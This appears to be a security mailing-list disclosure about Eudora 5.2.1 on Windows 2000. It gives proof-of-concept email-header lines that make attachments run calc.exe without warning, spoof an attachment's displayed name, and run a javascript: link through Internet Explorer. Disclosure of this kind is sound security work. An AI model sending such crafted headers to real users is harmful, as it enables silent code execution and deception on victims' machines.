Building on my Eudora attachment spoof http://www.securityfocus.com/archive/1/322286 I have now found better games to play: From: me To: you Ensure victim has both attachments 'calc' and 'calc.exe' (sent in this, or previous, email). Then the following shows 'windows' icon and runs calc.exe without warning when clicked: Attachment Converted<CR>: attach\calc Other mis-features I found (but I do not see how to make them into a credible exploit): If we can guess the full path to the attach directory then can change the name shown to anything we like, but get broken icon: Attachment Converted<CR>: <A href=H:/windows/.eudora/attach/calc>file.txt</a> Javascript done with InternetExplorer even if we set own viewer: Attachment Converted<CR>: <A href=javascript:alert('hello')>hello.txt</a> Replace the four-character <CR> marker with the single byte CR=0x0d in all of above. Tested with Eudora 5.2.1 on Windows 2000. Cheers, Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia
